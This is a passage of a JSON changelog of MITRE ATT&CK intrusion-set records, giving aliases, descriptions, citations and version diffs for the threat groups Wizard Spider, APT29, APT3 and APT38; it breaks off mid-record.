                    "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)",
                    "aliases": [
                        "Wizard Spider",
                        "UNC1878",
                        "TEMP.MixMaster",
                        "Grim Spider",
                        "FIN12",
                        "GOLD BLACKBURN",
                        "ITG23",
                        "Periwinkle Tempest",
                        "DEV-0193",
                        "Pistachio Tempest",
                        "DEV-0237"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0102",
                            "external_id": "G0102"
                        },
                        {
                            "source_name": "Grim Spider",
                            "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)"
                        },
                        {
                            "source_name": "UNC1878",
                            "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)"
                        },
                        {
                            "source_name": "TEMP.MixMaster",
                            "description": "(Citation: FireEye Ryuk and Trickbot January 2019)"
                        },
                        {
                            "source_name": "ITG23",
                            "description": "(Citation: IBM X-Force ITG23 Oct 2021)"
                        },
                        {
                            "source_name": "FIN12",
                            "description": "(Citation: Mandiant FIN12 Oct 2021)"
                        },
                        {
                            "source_name": "Periwinkle Tempest",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "DEV-0193",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "Pistachio Tempest",
                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
                        },
                        {
                            "source_name": "DEV-0237",
                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
                        },
                        {
                            "source_name": "GOLD BLACKBURN",
                            "description": "(Citation: Secureworks Gold Blackburn Mar 2022)"
                        },
                        {
                            "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020",
                            "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.",
                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a"
                        },
                        {
                            "source_name": "FireEye Ryuk and Trickbot January 2019",
                            "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.",
                            "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html"
                        },
                        {
                            "source_name": "CrowdStrike Ryuk January 2019",
                            "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.",
                            "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"
                        },
                        {
                            "source_name": "CrowdStrike Grim Spider May 2019",
                            "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.",
                            "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/"
                        },
                        {
                            "source_name": "FireEye KEGTAP SINGLEMALT October 2020",
                            "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.",
                            "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Microsoft_PistachioTempest_Jan2024",
                            "description": "Microsoft. (2024, January 25). Financially Motivated Threat Actor Pistachio Tempest. Retrieved December 15, 2025.",
                            "url": "https://www.microsoft.com/en-us/security/security-insider/threat-landscape/pistachio-tempest"
                        },
                        {
                            "source_name": "CrowdStrike Wizard Spider October 2020",
                            "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.",
                            "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/"
                        },
                        {
                            "source_name": "Secureworks Gold Blackburn Mar 2022",
                            "description": "Secureworks Counter Threat Unit. (2022, March 1). Gold Blackburn Threat Profile. Retrieved June 15, 2023.",
                            "url": "https://www.secureworks.com/research/threat-profiles/gold-blackburn"
                        },
                        {
                            "source_name": "Mandiant FIN12 Oct 2021",
                            "description": "Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.",
                            "url": "https://web.archive.org/web/20220313061955/https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf"
                        },
                        {
                            "source_name": "IBM X-Force ITG23 Oct 2021",
                            "description": "Villadsen, O., et al. (2021, October 13). Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds. Retrieved June 15, 2023.",
                            "url": "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Edward Millington",
                        "Oleksiy Gayda"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "4.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 16:26:04.859000+00:00\", \"old_value\": \"2025-03-12 20:33:21.597000+00:00\"}, \"root['external_references'][17]['url']\": {\"new_value\": \"https://web.archive.org/web/20220313061955/https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf\", \"old_value\": \"https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf\", \"new_path\": \"root['external_references'][20]['url']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"4.1\", \"old_value\": \"4.0\"}}, \"iterable_item_added\": {\"root['aliases'][9]\": \"Pistachio Tempest\", \"root['aliases'][10]\": \"DEV-0237\", \"root['external_references'][8]\": {\"source_name\": \"Pistachio Tempest\", \"description\": \"(Citation: Microsoft_PistachioTempest_Jan2024)\"}, \"root['external_references'][9]\": {\"source_name\": \"DEV-0237\", \"description\": \"(Citation: Microsoft_PistachioTempest_Jan2024)\"}, \"root['external_references'][17]\": {\"source_name\": \"Microsoft_PistachioTempest_Jan2024\", \"description\": \"Microsoft. (2024, January 25). Financially Motivated Threat Actor Pistachio Tempest. Retrieved December 15, 2025.\", \"url\": \"https://www.microsoft.com/en-us/security/security-insider/threat-landscape/pistachio-tempest\"}}}",
                    "previous_version": "4.0",
                    "version_change": "4.0 \u2192 4.1"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:52.748000+00:00",
                    "modified": "2026-01-20 16:22:04.140000+00:00",
                    "name": "APT29",
                    "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)",
                    "aliases": [
                        "APT29",
                        "IRON RITUAL",
                        "IRON HEMLOCK",
                        "NobleBaron",
                        "Dark Halo",
                        "NOBELIUM",
                        "UNC2452",
                        "YTTRIUM",
                        "The Dukes",
                        "Cozy Bear",
                        "CozyDuke",
                        "SolarStorm",
                        "Blue Kitsune",
                        "UNC3524",
                        "Midnight Blizzard"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0016",
                            "external_id": "G0016"
                        },
                        {
                            "source_name": "CozyDuke",
                            "description": "(Citation: Crowdstrike DNC June 2016)"
                        },
                        {
                            "source_name": "Cozy Bear",
                            "description": "(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022)"
                        },
                        {
                            "source_name": "The Dukes",
                            "description": "(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)"
                        },
                        {
                            "source_name": "APT29",
                            "description": "(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)"
                        },
                        {
                            "source_name": "UNC2452",
                            "description": "(Citation: FireEye SUNBURST Backdoor December 2020)"
                        },
                        {
                            "source_name": "UNC3524",
                            "description": "(Citation: Mandiant APT29 Eye Spy Email Nov 22)"
                        },
                        {
                            "source_name": "Midnight Blizzard",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "YTTRIUM",
                            "description": "(Citation: Microsoft Unidentified Dec 2018)"
                        },
                        {
                            "source_name": "NOBELIUM",
                            "description": "(Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)"
                        },
                        {
                            "source_name": "Blue Kitsune",
                            "description": "(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)"
                        },
                        {
                            "source_name": "IRON HEMLOCK",
                            "description": "(Citation: Secureworks IRON HEMLOCK Profile)"
                        },
                        {
                            "source_name": "IRON RITUAL",
                            "description": "(Citation: Secureworks IRON RITUAL Profile)"
                        },
                        {
                            "source_name": "NobleBaron",
                            "description": "(Citation: SentinelOne NobleBaron June 2021)"
                        },
                        {
                            "source_name": "SolarStorm",
                            "description": "(Citation: Unit 42 SolarStorm December 2020)"
                        },
                        {
                            "source_name": "Dark Halo",
                            "description": "(Citation: Volexity SolarWinds)"
                        },
                        {
                            "source_name": "Crowdstrike DNC June 2016",
                            "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.",
                            "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
                        },
                        {
                            "source_name": "Volexity SolarWinds",
                            "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.",
                            "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"
                        },
                        {
                            "source_name": "CrowdStrike SUNSPOT Implant January 2021",
                            "description": "CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.",
                            "url": "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/"
                        },
                        {
                            "source_name": "CrowdStrike StellarParticle January 2022",
                            "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.",
                            "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"
                        },
                        {
                            "source_name": "GRIZZLY STEPPE JAR",
                            "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.",
                            "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf"
                        },
                        {
                            "source_name": "FireEye APT29 Nov 2018",
                            "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.",
                            "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html"
                        },
                        {
                            "source_name": "F-Secure The Dukes",
                            "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.",
                            "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf"
                        },
                        {
                            "source_name": "ESET Dukes October 2019",
                            "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf"
                        },
                        {
                            "source_name": "FireEye SUNBURST Backdoor December 2020",
                            "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.",
                            "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
                        },
                        {
                            "source_name": "SentinelOne NobleBaron June 2021",
                            "description": "Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.",
                            "url": "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/"
                        },
                        {
                            "source_name": "Mandiant APT29 Eye Spy Email Nov 22",
                            "description": "Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.",
                            "url": "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Microsoft Unidentified Dec 2018",
                            "description": "Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.",
                            "url": "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/"
                        },
                        {
                            "source_name": "MSTIC NOBELIUM May 2021",
                            "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.",
                            "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
                        },
                        {
                            "source_name": "MSRC Nobelium June 2021",
                            "description": "MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.",
                            "url": "https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/"
                        },
                        {
                            "source_name": "MSTIC Nobelium Toolset May 2021",
                            "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.",
                            "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
                        },
                        {
                            "source_name": "MSTIC NOBELIUM Mar 2021",
                            "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM\u2019s layered persistence. Retrieved March 8, 2021.",
                            "url": "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/"
                        },
                        {
                            "source_name": "NCSC APT29 July 2020",
                            "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.",
                            "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf"
                        },
                        {
                            "source_name": "Cybersecurity Advisory SVR TTP May 2021",
                            "description": "NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.",
                            "url": "https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf"
                        },
                        {
                            "source_name": "NSA Joint Advisory SVR SolarWinds April 2021",
                            "description": "NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.",
                            "url": "https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF"
                        },
                        {
                            "source_name": "PWC WellMess C2 August 2020",
                            "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.",
                            "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html"
                        },
                        {
                            "source_name": "PWC WellMess July 2020",
                            "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.",
                            "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html"
                        },
                        {
                            "source_name": "Secureworks IRON HEMLOCK Profile",
                            "description": "Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.",
                            "url": "http://www.secureworks.com/research/threat-profiles/iron-hemlock"
                        },
                        {
                            "source_name": "Secureworks IRON RITUAL Profile",
                            "description": "Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.",
                            "url": "https://www.sophos.com/en-us/threat-profiles/iron-ritual"
                        },
                        {
                            "source_name": "UK Gov Malign RIS Activity April 2021",
                            "description": "UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.",
                            "url": "https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services"
                        },
                        {
                            "source_name": "UK Gov UK Exposes Russia SolarWinds April 2021",
                            "description": "UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.",
                            "url": "https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise"
                        },
                        {
                            "source_name": "UK NSCS Russia SolarWinds April 2021",
                            "description": "UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.",
                            "url": "https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise"
                        },
                        {
                            "source_name": "Unit 42 SolarStorm December 2020",
                            "description": "Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/"
                        },
                        {
                            "source_name": "White House Imposing Costs RU Gov April 2021",
                            "description": "White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.",
                            "url": "https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Daniyal Naeem, BT Security",
                        "Matt Brenton, Zurich Insurance Group",
                        "Katie Nickels, Red Canary",
                        "Joe Gumke, U.S. Bank",
                        "Liran Ravich, CardinalOps",
                        "Vicky Ray, RayvenX"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "6.2",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 16:22:04.140000+00:00\", \"old_value\": \"2025-04-04 17:07:43.344000+00:00\"}, \"root['external_references'][39]['url']\": {\"new_value\": \"https://www.sophos.com/en-us/threat-profiles/iron-ritual\", \"old_value\": \"https://www.secureworks.com/research/threat-profiles/iron-ritual\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "6.2"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:55.853000+00:00",
                    "modified": "2026-01-20 15:46:53.916000+00:00",
                    "name": "APT3",
                    "description": "[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)",
                    "aliases": [
                        "APT3",
                        "Gothic Panda",
                        "Pirpi",
                        "UPS Team",
                        "Buckeye",
                        "Threat Group-0110",
                        "TG-0110"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0022",
                            "external_id": "G0022"
                        },
                        {
                            "source_name": "APT3",
                            "description": "(Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)"
                        },
                        {
                            "source_name": "UPS Team",
                            "description": "(Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)"
                        },
                        {
                            "source_name": "Pirpi",
                            "description": "(Citation: PWC Pirpi Scanbox)"
                        },
                        {
                            "source_name": "Gothic Panda",
                            "description": "(Citation: PWC Pirpi Scanbox) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)"
                        },
                        {
                            "source_name": "Threat Group-0110",
                            "description": "(Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)"
                        },
                        {
                            "source_name": "TG-0110",
                            "description": "(Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)"
                        },
                        {
                            "source_name": "Buckeye",
                            "description": "(Citation: Symantec Buckeye)"
                        },
                        {
                            "source_name": "FireEye Clandestine Wolf",
                            "description": "Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf \u2013 Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.",
                            "url": "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html"
                        },
                        {
                            "source_name": "Recorded Future APT3 May 2017",
                            "description": "Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3. Retrieved September 16, 2024.",
                            "url": "https://www.recordedfuture.com/research/chinese-mss-behind-apt3"
                        },
                        {
                            "source_name": "PWC Pirpi Scanbox",
                            "description": "Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox & CVE-2015-3113. Retrieved March 30, 2016.",
                            "url": "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html"
                        },
                        {
                            "source_name": "FireEye Operation Double Tap",
                            "description": "Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.",
                            "url": "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html"
                        },
                        {
                            "source_name": "Symantec Buckeye",
                            "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.",
                            "url": "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Patrick Sungbahadoor"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.4",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:46:53.916000+00:00\", \"old_value\": \"2024-09-16 16:18:53.978000+00:00\"}, \"root['external_references'][12]['url']\": {\"new_value\": \"https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong\", \"old_value\": \"http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.4"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-01-29 21:27:24.793000+00:00",
                    "modified": "2025-11-13 19:21:05.133000+00:00",
                    "name": "APT38",
                    "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.",
                    "aliases": [
                        "APT38",
                        "NICKEL GLADSTONE",
                        "BeagleBoyz",
                        "Bluenoroff",
                        "Stardust Chollima",
                        "Sapphire Sleet",
                        "COPERNICIUM"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0082",
                            "external_id": "G0082"
                        },
                        {
                            "source_name": "BeagleBoyz",
                            "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)"
                        },
                        {
                            "source_name": "Stardust Chollima",
                            "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)"
                        },
                        {
                            "source_name": "APT38",
                            "description": "(Citation: FireEye APT38 Oct 2018)"
                        },
                        {
                            "source_name": "Bluenoroff",
                            "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)"
                        },
                        {
                            "source_name": "Sapphire Sleet",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "COPERNICIUM",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "NICKEL GLADSTONE",
                            "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)"
                        },
                        {
                            "source_name": "CrowdStrike GTR 2021 June 2021",
                            "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.",
